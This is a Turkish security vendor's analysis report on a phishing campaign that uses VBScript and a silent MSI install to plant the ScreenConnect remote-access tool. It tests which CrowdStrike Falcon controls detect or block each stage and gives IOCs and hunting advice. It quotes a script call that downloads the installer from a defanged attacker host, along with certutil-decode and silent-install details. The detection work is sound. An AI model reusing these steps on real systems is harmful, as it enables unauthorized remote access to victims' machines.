InfinitumIT
Analiz Raporu

CrowdStrike Application Abuse ile ScreenConnect Suistimalinin Engellenmesi

Adobe temalı bir phishing kampanyasında VBScript üzerinden kurulan ScreenConnect zinciri, gerçek bir CrowdStrike Falcon ortamında test edildi. Application Abuse Prevention'ın RMM client'ına gerçek zamanlı müdahalesi, MSI aşamasındaki MaliciousMsiInstaller tespiti ve InfinitumIT Custom IOA kuralıyla script aşamasında sağlanan erken engelleme karşılaştırıldı.

13.09.2026 · 11 dk okuma · InfinitumIT
CrowdStrike Application Abuse ile ScreenConnect Suistimalinin Engellenmesi

Günümüz saldırılarında güvenlik kontrollerinin aşılması ve yetkisiz erişimin olağan kurumsal faaliyetler arasında gizlenmesi amacıyla meşru yazılımlar tehdit aktörleri tarafından sıklıkla suistimal edilmektedir. Uzaktan izleme ve yönetim araçları (RMM), bu yaklaşımın yaygın örnekleri arasındadır. Son dönemde RMM suistimalinin arttığı ve phishing kampanyalarıyla kullanıcıların saldırgan tarafından yönetilen uzaktan erişim client programlarını kurmaya yönlendirildiği raporlanmıştır.

Bu saldırılarda sahte Zoom, Microsoft Teams ve Google Meet davetleri üzerinden veya zorunlu güncelleme yönlendirmeleri kullanılabilmektedir. Belge inceleme talepleri, DocuSign görünümlü bildirimler ve Evite ya da Punchbowl temalı davetiyeler de RMM dağıtımını hedefleyen phishing kampanyalarında kullanılan yöntemler arasında yer almaktadır.

Bu konu doğrultusunda, InfinitumIT MDR ekibi tarafından gerçek bir phishing kampanyası kapsamında incelenen Adobe temalı VBScript ve ScreenConnect saldırı zinciri ele alınmıştır. CrowdStrike Falcon'a geçtiğimiz ay eklenen Application Abuse Prevention özelliğinin, RMM client programının yürütülmesi sırasında gerçek zamanlı müdahale uygulayarak ScreenConnect suistimalini engellemesi laboratuvar ortamında doğrulanmıştır. Vaka bulguları üzerinden Application Abuse Prevention müdahalesi, MSI aşamasındaki ek tespitler ve InfinitumIT Custom IOA kuralı seti ile sağlanan erken engelleme karşılaştırılmıştır.

Adobe temalı phishing kampanyasından VBScript ve MSI üzerinden ScreenConnect kurulumuna ilerleyen saldırı akış şeması
Şekil 1. Adobe temalı phishing kampanyasından VBScript ve MSI üzerinden ScreenConnect kurulumuna ilerleyen saldırı akışı.

Adobe Temalı Phishing Kampanyası ve VBScript Teslimi

İncelenen kampanyada kullanıcı, kendisine iletilen gizli bir belgenin Adobe üzerinden görüntülenmesi gerektiği yönlendirmesiyle hedeflenmiştir. Adobe görünümünü taklit eden PDF içerisindeki “View with Adobe” bağlantısı üzerinden saldırgana ait web sayfasına yönlendirme yapılmıştır. PDF görüntüleyicisinin güvenlik uyarısında hedef adresin file-viewer[.]shit[.]vc olduğu görülmüştür.

View with Adobe bağlantısını içeren Adobe temalı PDF PDF içindeki bağlantının file-viewer.shit.vc alan adına yönlendiğini gösteren güvenlik uyarısı
Şekil 2. Solda belge görüntüleme phishing dokümanı, sağda PDF içindeki dış bağlantının güvenlik uyarısı.

Yönlendirme sayfasında Browser-in-the-Browser tekniği kullanılarak tarayıcı içerisinde sahte bir Adobe penceresi ve adres çubuğu oluşturulmuştur. Gerçek tarayıcı adresinde saldırgana ait alan adı bulunmasına rağmen taklit edilen pencere içerisinde adobe.com adresi gösterilmiştir. “Adobe Reader kurulumu” olarak sunulan indirme işleminin, rastgele karakterlerle isimlendirilmiş bir Visual Basic Script dosyası teslim ettiği tespit edilmiştir.

Gerçek alan adı ile sahte Adobe adres çubuğunun ve indirilen VBS dosyasının birlikte görünümü
Şekil 3. Sahte Adobe penceresi ve tarayıcının indirmeler bölümündeki VBS dosyası.

İndirilen dosyanın kullanıcı tarafından açılmasıyla Windows Script Host üzerinden kod yürütme aşamasına geçilmiştir. Bu noktada belge görüntüleme yönlendirmesi, endpoint üzerinde wscript.exe aracılığıyla VBScript çalıştırılmasına dönüşmüştür.

Ana Örnekte Doğrudan VBScript ve MSI Yürütme Zinciri

Ana kampanyada MSI indirme işlemi, VBScript içerisindeki HTTP ve execution objectleri aracılığıyla gerçekleştirilmiştir. CrowdStrike telemetrisinde IServerXMLHTTPRequest2.open çağrısıyla GET request methodu ve hedef URL tanımlandığı, ardından send, responseBody ve SaveToFile çağrılarının yürütüldüğü görülmüştür.

CrowdStrike script telemetrisinde kaydedilen ilgili çağrı aşağıda sunulmuştur.

IServerXMLHTTPRequest2.open(
    "GET",
    "hxxps://apv2[.]hanikbloom[.]com/ope/ScreenConnect.ClientSetup.msi",
    "false");
Falcon script telemetrisinde HTTP isteği, MSI kaydı ve msiexec çağrısını gösteren kayıt
Şekil 4. Falcon script telemetrisinde MSI indirme adresi, geçici dizine dosya yazımı ve msiexec.exe çağrısına ilişkin kayıtlar.

MSI paketinin %TEMP% altında SC_Setup_<değişken>.msi biçiminde kaydedildiği ve msiexec.exe üzerinden /qn /norestart parametreleriyle sessiz kurulumun başlatıldığı görülmüştür. Bu örnekte indirme amacıyla ayrı bir PowerShell veya certutil alt processi kullanılmamıştır. Yürütme zinciri, wscript.exe sonrasında doğrudan msiexec.exe aşamasına ilerlemiştir.

Application Abuse Kapalıyken Gözlemlenen Sonuçlar

InfinitumIT laboratuvar ortamında gerçekleştirilen ilk testte Application Abuse özelliği devre dışı bırakılmış, diğer endpoint prevention policy ayarları en sıkı seviyelerde yapılandırılmıştır. VBScript çalıştırılması, MSI kurulumu ve ScreenConnect client programının yürütülmesi aşamalarında herhangi bir alarm veya engelleme gözlemlenmemiştir. Buna rağmen execution zincirine ait process ilişkileri CrowdStrike telemetrisine kaydedilmiştir.

Telemetri loglarından oluşturulan graph tabanlı process tree aşağıdaki şekildedir.

İlk testte wscript ve msiexec süreç ağacı ile MSI kurulum komut satırı
Şekil 5. wscript.exe sonrasında başlatılan msiexec.exe ve sessiz MSI kurulumuna ait komut satırı.

MSI kurulumunu takiben ScreenConnect.WindowsClient.exe processinin başlatıldığı ve çalışmaya devam ettiği görülmüştür. Konsoldaki “Currently Running” durumu, client programının yürütülmesini doğrulamıştır. Bu testte saldırı zincirinin telemetri üzerinden incelenebildiği, ancak aynı aktivitelerin alarm veya önleme aksiyonuna dönüşmediği tespit edilmiştir.

İlk testte çalışmaya devam eden ScreenConnect WindowsClient süreci
Şekil 6. Kurulum sonrasında ScreenConnect.WindowsClient.exe için görülen “Currently Running” durumu.

Application Abuse Prevention Policy Yapılandırması

ScreenConnect gibi meşru uzaktan erişim araçları, saldırganın yönettiği bir yapılandırmayla kurulduğunda yetkisiz erişim amacıyla kullanılabilmektedir. Application Abuse Prevention, bu tür uygulamaların kullanımına politika düzeyinde kontrol uygulanmasını sağlamaktadır. CrowdStrike tarafından açıklanan bu yaklaşım, suistimale açık uygulamalara yönelik önleme kontrolleriyle davranışsal tespitlerin tamamlanmasını amaçlamaktadır. [1]

İkinci test kapsamında INFNT-App-Abuse-Test adlı Windows Application Abuse Prevention politikası etkinleştirilmiştir. Remote monitoring and management (RMM) kategorisinde “Prevent all” seçilerek politika kapsamındaki RMM uygulamalarının yürütülmesinin engellenmesi hedeflenmiştir.

Etkin INFNT-App-Abuse-Test politikasında RMM kategorisi için Prevent all seçimi
Şekil 7. Etkin INFNT-App-Abuse-Test politikası ve RMM kategorisinde uygulanan “Prevent all” yapılandırması.

Politika ekranında, “Prevent all” etkinleştirilmeden önce mevcut RMM kullanımının dashboard üzerinden incelenmesi, izin verilecek uygulamalar için exclusions oluşturulması ve endpoint prevention politikasındaki “Unknown executable analysis” ayarının etkinleştirilmesi önerilmektedir. Üretim ortamına uygulanacak kapsam ve istisnalar, kurumun onaylı uzaktan destek ihtiyaçlarına göre belirlenmelidir.

Bu kontrol, kurumda kullanımına izin verilmeyen RMM uygulamalarına uygulama düzeyinde müdahale edilmesini sağlamaktadır. Script çalıştırma davranışını hedefleyen tespitler ve Custom IOA kurallarıyla birlikte kullanılması, aynı saldırı zincirinin farklı aşamalarda ele alınmasına olanak tanımaktadır.

Application Abuse ile ScreenConnect Client Programının Engellenmesi

Application Abuse etkinleştirildikten sonra ana kampanyaya ait VBScript yeniden çalıştırılmıştır. Script aşamasında yerleşik bir alarm veya engelleme gözlemlenmemiştir. MSI kurulumunun başlattığı ScreenConnect.ClientService.exe processine ise Application Abuse Prevention kapsamında müdahale edildiği tespit edilmiştir.

Application Abuse Prevention kaydında ScreenConnect ClientService sürecine uygulanan remediation
Şekil 8. ScreenConnect RMM client programına yönelik Application Abuse kaydı. Konsolda önem seviyesi Informational, aksiyon ise “Remediation performed”.

Test sonucunda ScreenConnect client programının çalışmasının engellendiği ve client programının sistemden kaldırıldığı gözlemlenmiştir. Falcon konsolunda uygulanan aksiyon “Remediation performed” olarak kaydedilmiştir. Alarm kaydının Informational severity seviyesinde olması, ilgili olayda önleme aksiyonu uygulanmadığı veya düşük riskli bir olay olduğu anlamına gelmemektedir.

Application Abuse kaydının aksiyon ve RMM açıklaması alanlarının büyütülmüş görünümü
Şekil 8 ayrıntısı. Aksiyon alanı ve “Application Abuse Prevention detection for RMM tools” açıklaması.

Process kaydında client programı servisinin kısa süreli başlatıldığı ve ardından müdahale uygulandığı görülmüştür. Dolayısıyla bu testte Application Abuse kontrolünün etkisi, RMM client programının yürütülmesi aşamasında doğrulanmıştır. VBScript çalıştırılması ve MSI indirilmesi, bu müdahaleden önce gerçekleşmiştir.

MSI Kurulumu Aşamasında Oluşan Ek Tespit

Application Abuse testinde msiexec.exe ile ilişkili High seviyeli MaliciousMsiInstaller alarmı da oluşmuştur. İlgili kayıt, Falcon tarafından Persistence via Event Triggered Execution ve T1546 ile eşleştirilmiştir. MSI kurulum aktivitesine ilişkin bu tespit, RMM client programına uygulanan Application Abuse müdahalesinden ayrı bir alarm olarak değerlendirilmiştir.

High seviyeli MaliciousMsiInstaller alarmı, T1546 eşleştirmesi ve msiexec kurulum komutu
Şekil 9. MaliciousMsiInstaller alarmının önem seviyesi, teknik eşleştirmesi ve “Remediation performed” aksiyonu.

Telemetri loglarından oluşturulan graph tabanlı process tree incelendiğinde High seviyeli tespitin msiexec.exe processi ile ilişkilendirildiği görülmüştür.

İkinci testte msiexec süreç düğümüne ilişkilendirilmiş High detection graph görünümü
Şekil 10. wscript.exe ve msiexec.exe yürütme zincirinde MSI processine ilişkilendirilen High seviyeli tespit.

İlk testte alarm oluşmayan MSI aktivitesinin sonraki testte tespit edildiği gözlemlenmiştir. Bu bulgu, tespit davranışındaki değişimi göstermektedir. CrowdStrike tarafında şüpheli MSI kurulumları doğrultusunda tespit mekanizmasında güncelleme yapılmış olabileceği değerlendirilmektedir. Her iki testte de ana örneğin VBS çalıştırma aşamasında yerleşik alarm veya engelleme gözlemlenmemiştir.

Application Abuse özelliği sayesinde ilgili RMM programının kurulumu son aşamada başarıyla engellenmiştir.

Diğer Kampanya Örneklerinde VBScript Çalıştırma Zincirinin Engellenmesi

Ana örneğe ek olarak, benzer RMM phishing kampanyalarında kullanılan farklı VBScript dosyaları da test edilmiştir. Özellikle obfuscated içerik veya komutlar barındıran, PowerShell ya da certutil processlerini devreye alan örneklerde CrowdStrike tarafından başarılı tespit ve engelleme gerçekleştirilmiştir. Bu sonuçlar, test edilen VBS örneklerinin ürettiği davranış ve process ilişkileri çerçevesinde değerlendirilmiştir.

PowerShell içeren örnekte PDF_Upgrade_Installation.vbs.vbs dosyası wscript.exe üzerinden çalıştırılmış ve execution zincirinde powershell.exe processi oluşmuştur. CrowdStrike alarm kaydında Medium seviyeli “Command and Control via Remote Access Tools” tespiti üretilmiş, “Parent process killed” aksiyonu uygulandığı görülmüştür.

VBS ve PowerShell süreç zincirinde Remote Access Tools tespiti ve Parent process killed aksiyonu
Şekil 11. wscript.exe ve powershell.exe içeren zincirde CrowdStrike tarafından uygulanan process sonlandırma aksiyonu.

Obfuscated certutil Komutunun Engellenmesi

Diğer örnekte explorer.exe sonrasında iki wscript.exe processi ve certutil.exe içeren bir execution zinciri gözlemlenmiştir. High seviyeli alarmda alarm ObfCertutilCmd olarak kaydedilmiştir. İlgili davranış “Defense Evasion via Deobfuscate/Decode Files or Information” ve T1140 ile eşleştirilmiş, “Process blocked” aksiyonu uygulanmıştır.

WScript süreçleri altında certutil decode işleminin ObfCertutilCmd ile engellenmesi
Şekil 12. certutil.exe üzerinde oluşan ObfCertutilCmd alarmı ve “Process blocked” aksiyonu.

Komut satırında -f -decode parametreleri kullanılarak geçici dizindeki .b64 içeriğinin ScreenConnect.ClientSetup.msi dosyasına dönüştürülmeye çalışıldığı görülmüştür. Bu nedenle görüntüde doğrulanan engelleme noktası, RMM client'ının MSI dosyasına dönüştürülmesi aşamasıdır.

certutil alarmındaki Process blocked aksiyonu, T1140 ve ObfCertutilCmd alanlarının büyütülmüş görünümü
Şekil 12 ayrıntısı. Engelleme aksiyonu, teknik eşleştirmesi ve ObfCertutilCmd adı.

Ana kampanyada ise MSI içeriği doğrudan VBScript içerisindeki HTTP ve execution çağrılarıyla alınmış ve msiexec.exe ile çalıştırılmıştır. Ek testlerde engellenen PowerShell ve certutil aşamaları bu zincirde bulunmamaktadır. Bulgular, CrowdStrike tarafından bazı VBS çeşitlerinin başarıyla engellendiğini, ancak ana örnekte script aşamasında aynı sonucun elde edilmediğini göstermektedir.

Custom IOA ile VBScript Aşamasında Erken Engelleme

InfinitumIT MDR hizmeti kapsamında geliştirilen Custom IOA kural setimiz, farklı saldırı tekniklerini kapsamak, endpoint üzerindeki saldırı yüzeyini daraltmak ve CrowdStrike önleme yeteneklerini ortamın ihtiyaçlarına göre güçlendirmek amacıyla kullanılmaktadır. Ana kampanyadaki VBScript çalıştırma davranışı da bu kural seti kapsamında ayrıca test edilmiştir.

Test sırasında INFNT-IOA-0140 - Script Execution via WScript or CScript kuralı tetiklenmiştir. Process Creation türündeki kural üzerinden, indirilen VBS dosyasını çalıştıran wscript.exe için High seviyeli Custom IOA kaydı oluşturulmuş ve “Process blocked” aksiyonu uygulanmıştır.

INFNT-IOA-0140 Custom IOA kuralı ile VBS dosyasını çalıştıran wscript sürecinin engellenmesi
Şekil 13. INFNT-IOA-0140 kuralının tetiklenmesi ve wscript.exe için “Process blocked” sonucu.
Script Execution via WScript or CScript kural adı ve Process Creation türünün büyütülmüş görünümü
Şekil 13 ayrıntısı. Kural adı, Process Creation türü ve script çalıştırma davranışına ilişkin açıklama.

Bu testte RMM client programının çalıştırılmasını beklemeden script host processine müdahale edildiği doğrulanmıştır. Application Abuse testinde ScreenConnect client programına uygulanan kontrol, Custom IOA testinde daha erken bir aşamayı hedefleyen davranışsal engellemeyle tamamlanmıştır.

Test Sonuçlarının Karşılaştırmalı Değerlendirmesi

InfinitumIT lab ortamında MDR ekibince gerçekleştirilen testlerde, aynı RMM hedefine ilerleyen farklı execution zincirlerinin farklı aşamalarda durdurulabildiği görülmüştür. Ana örnekte Application Abuse ile client programına müdahale edilmiş, Custom IOA kontrolüyle script host aşamasında erken engelleme sağlanmıştır. Temel sonuçlar aşağıdaki tabloda karşılaştırılmıştır.

Test senaryosuGözlenen tespitGözlenen sonuç
Ana örnek
Application Abuse kapalı
Script, MSI ve client programı aşamalarında alarm gözlemlenmemiştirScreenConnect kurulmuş ve çalıştırılmıştır
Ana örnek
Application Abuse açık
VBS aşamasında alarm gözlemlenmemiştir
RMM kaydı Informational
MSI alarmı High
Client programına müdahale edilmiş ve remediation uygulanmıştır
Ana davranış
Custom IOA testi
INFNT-IOA-0140
High
wscript.exe
Process blocked
Diğer VBS örneği
PowerShell zinciri
Remote Access Tools
Medium
Parent process killed
Diğer VBS örneği
certutil zinciri
ObfCertutilCmd
High
certutil.exe
Process blocked

Ana kampanyada Application Abuse, script aşamasında alarm oluşmasına bağlı kalmadan RMM kullanımına politika uygulamıştır. Falcon telemetrisi inceleme için process ilişkilerini sağlamış, yerleşik MSI tespiti kurulum aşamasını görünür kılmış ve Custom IOA kuralı script çalıştırılmasına müdahale etmiştir. Bu bulgular, telemetri, alarm ve önleme aksiyonlarının ayrı olarak doğrulanması gerektiğini göstermektedir.

Test sonuçları, çalıştırılan örnek ve uygulanan politika bağlamında geçerlidir. Diğer VBS çeşitlerinde başarılı engelleme görülmesi, ana kampanyanın script aşamasındaki sonucu değiştirmemektedir. Aynı şekilde RMM client programına uygulanan müdahale ile MSI aktivitesine ilişkin ek alarmın ayrı kayıtlardan doğrulanması, önleme mekanizmalarının doğru değerlendirilmesini sağlamaktadır.

Davranışsal Hunting Önerileri

Aşağıdaki öneriler vaka bulguları ve lab testleri esas alınarak hazırlanmıştır. İnceleme önceliğinin, birden fazla sinyalin aynı cihaz ve çalıştırma zincirinde birleşmesine göre belirlenmesi önerilmektedir.

Script ve MSI ilişkisi: Downloads, Desktop veya geçici dizinlerden çalıştırılan VBS dosyaları, wscript.exe ya da cscript.exe ağ bağlantıları, MSI dosyası oluşturulması ve ardından msiexec.exe yürütülmesiyle ilişkilendirilmelidir. SC_Setup_*.msi, /qn ve /norestart gibi komut satırı parametreleri process bağlamıyla birlikte incelenmelidir. Ana örnekte ayrı bir PowerShell processi bulunmadığından, hunting kapsamının yalnızca PowerShell alt processlerine bağlı oluşturulmaması gerekmektedir.

ScreenConnect ve 8041 trafiği: Endpointlerden internet üzerindeki TCP/8041 hedeflerine yapılan ve onaylı uzaktan destek altyapısıyla eşleşmeyen bağlantıların izlenmesi önerilmektedir. Bu vakada servis komut satırındaki p=8041 değeri bağlantı portunu göstermektedir. Hedef alan adı ve IP; ScreenConnect processi, servis kurulumu ve client programı yapılandırmasıyla ilişkilendirilmelidir. Port eşleşmesi tek başına saldırı kanıtı değildir; değerlendirme process ve hedef altyapı bağlamında gerçekleştirilmelidir.

Cloudflare üzerinden MSI paketi teslimi: Benzer RMM phishing kampanyalarında workers.dev ve r2.dev gibi paylaşımlı hosting altyapılarının RMM client'larını barındıran MSI paket teslimi amacıyla suistimal edilebildiği görülmektedir. Bu altyapılar üzerinden MSI, ZIP veya ara yüklerin sağlanabildiği dikkate alınmalı; değerlendirme tam alt alan adı, URL yolu, dosya yazımı ve devamındaki execution aktiviteleriyle birlikte gerçekleştirilmelidir.

Tarayıcı dışı erişimler: workers.dev ve r2.dev adreslerine wscript.exe, cscript.exe, powershell.exe, mshta.exe, certutil.exe, curl.exe veya msiexec.exe gibi processlerden yapılan isteklerin özellikle incelenmesi önerilmektedir. Tam alt alan adı, varsa URL yolu, dosya yazımı ve sonraki kurulum aktivitesi ilişkilendirilmelidir. Kaynak process EDR telemetrisiyle doğrulanmalı, User-Agent bilgisi tek başına yeterli kabul edilmemelidir. Meşru otomasyonlar ve tarayıcıdan başlayan indirmeler de değerlendirme kapsamında tutulmalıdır.

Yeni RMM servisleri ve bağlantı hedefleri: ScreenConnect.ClientService.exe ve ScreenConnect.WindowsClient.exe processleri; yeni servis kaydı, kurulum dizini ve komut satırındaki h= ile p= parametreleriyle birlikte değerlendirilmelidir. Kurumda ScreenConnect kullanılsa dahi farklı bir sunucuya bağlanan yeni client programları ayrıca incelenmelidir. Müdahale sonrasında processin, servisin ve ilgili dış bağlantıların devam edip etmediği doğrulanmalıdır.

workers.dev ve r2.dev, meşru uygulamaların da kullandığı paylaşımlı hizmetlerdir. Bu alan adlarının tamamının zararlı IOC olarak değerlendirilmesi uygun değildir. Önceliklendirme, şüpheli alt alan adı ve davranış eşleşmelerine göre yapılmalıdır.

Olaya Ait IOC Verileri

Aşağıdaki indikatörler, kampanya incelemesinde paylaşılan veriler ve CrowdStrike kayıtları esas alınarak derlenmiştir. IP ve alan adı eşleşmeleri ilgili olay bağlamındaki değerleri yansıtmaktadır; barındırma bilgileri ve kullanım amacı zaman içerisinde değişebilmektedir.

Gösterge türüDeğer
Yönlendirme alan adıfile-viewer[.]shit[.]vc
Yönlendirme IP adresi216.126.237.29
MSI indirme alan adıapv2[.]hanikbloom[.]com
MSI indirme IP adresi132.243.165.131
ScreenConnect bağlantı alan adıberneys[.]fumoff[.]com
ScreenConnect bağlantı IP ve port162.220.13.202:8041
Ek ScreenConnect bağlantı alan adıapiv7[.]ghadirfoods[.]com
ScreenConnect MSI MD5EA78E2B01AB8D6ED9C7F616CEF729C65

Tam MSI indirme adresi, Falcon script telemetrisi üzerinden ayrıca doğrulanmıştır:

hxxps://apv2[.]hanikbloom[.]com/ope/ScreenConnect.ClientSetup.msi

Telemetride Gözlemlenen Ek Dosya ve Yapılandırma İzleri

Script kaydında MSI paketinin %TEMP% altında SC_Setup_9E79.msi adıyla kaydedildiği görülmüştür. Kurulum sonrasında başlatılan servis komut satırında h=berneys[.]fumoff[.]com ve p=8041 parametreleri tespit edilmiştir. İlgili servis yolu aşağıda sunulmuştur:

C:\Program Files (x86)\ScreenConnect Client (2c0864b709124ff1)\
    ScreenConnect.ClientService.exe

Dosya adları, kurulum dizini ve ScreenConnect processleri tek başına zararlılık göstergesi değildir. Bu izler, IOC tablosundaki bağlantı hedefleri ve VBS ve MSI yürütme zinciriyle birlikte değerlendirilmelidir. MD5, paylaşılan MSI örneğinin eşleştirilmesi amacıyla verilmiştir; farklı veya yeniden oluşturulmuş kurulum paketlerinde dosya özeti değişebilmektedir.

InfinitumIT MDR ile Sürekli Tespit ve Müdahale

RMM suistimalinde bir client programının meşru üretici imzasına sahip olması, bağlantı kurduğu sunucunun kuruma ait olduğunu veya kullanımının yetkilendirildiğini doğrulamamaktadır. Bu nedenle process ilişkilerinin, ağ bağlantılarının ve uygulama yapılandırmasının birlikte değerlendirilmesi gerekmektedir. İncelenen vaka, alarm üretmeyen aktivitelerin de telemetri üzerinden araştırılmasının önemini ortaya koymuştur.

InfinitumIT MDR hizmeti kapsamında endpoint, ağ ve kimlik verileri üzerinde 7/24 tehdit izleme, tehdit avcılığı ve uzman analist değerlendirmesi sağlanmaktadır. Şüpheli aktivitelerin doğrulanması ve olay müdahalesi, kurumun mevcut güvenlik operasyonlarıyla birlikte yürütülmektedir.

Bu çalışmada gerçekleştirilen laboratuvar testleri, CrowdStrike Application Abuse yapılandırmasının değerlendirilmesi ve INFNT Custom IOA kural setinin uygulanması, MDR hizmetinin somut katkıları arasında yer almaktadır. Kampanya bulgularının hunting çalışmalarına ve ortama uygun önleme kurallarına dönüştürülmesiyle, kullanılan güvenlik çözümlerinin tespit ve engelleme kapsamının sürekli geliştirilmesi amaçlanmaktadır.

Kaynaklar

Makalede referans verilen CrowdStrike kaynağı aşağıda sunulmuştur.

[1] CrowdStrike — How CrowdStrike Stops Living-off-the-Land Attacks


Hakan AKSUNGUR

InfinitumIT MDR

Bu yazı, gerçek bir phishing kampanyasına ait bulgular ile InfinitumIT laboratuvar ortamında CrowdStrike Falcon üzerinde yürütülen kontrollü testlere dayanmaktadır.

Bu içeriği faydalı buldunuz mu?

Tehdit bültenlerimiz ve MDR Insights raporları ilk siz alın.

Ekip sertifikalarımız

SANS, Offensive Security, EC-Council, CompTIA, ISACA, CREST ve INE tarafından akredite uzmanlarımız.

SANS GPEN
SANS GWAPT
SANS GICSP
SANS GRTP
SANS GCIH
SANS GSEC
Offensive Security OSCP
Offensive Security OSWP
EC-Council CEH
CompTIA Security+
ISACA CISM
ISACA CISA
CREST CRT
INE eWPTX
Fortinet FCP Secure Networking
Fortinet FCP Cloud Security
Fortinet FCP Security Operations
Fortinet FCSS Secure Networking
Fortinet FCSS SASE
Fortinet FCSS Cloud Security
Fortinet FCSS Security Operations
IBM QRadar Admin
SANS GPEN
SANS GWAPT
SANS GICSP
SANS GRTP
SANS GCIH
SANS GSEC
Offensive Security OSCP
Offensive Security OSWP
EC-Council CEH
CompTIA Security+
ISACA CISM
ISACA CISA
CREST CRT
INE eWPTX
Fortinet FCP Secure Networking
Fortinet FCP Cloud Security
Fortinet FCP Security Operations
Fortinet FCSS Secure Networking
Fortinet FCSS SASE
Fortinet FCSS Cloud Security
Fortinet FCSS Security Operations
IBM QRadar Admin

Çerez kullanımı

Sitemizde sadece zorunlu oturum ve dil tercihi çerezleri kullanıyoruz; üçüncü taraf izleme çerezi yoktur. Detay için Çerez Politikası ve KVKK Aydınlatma Metni'ni inceleyin.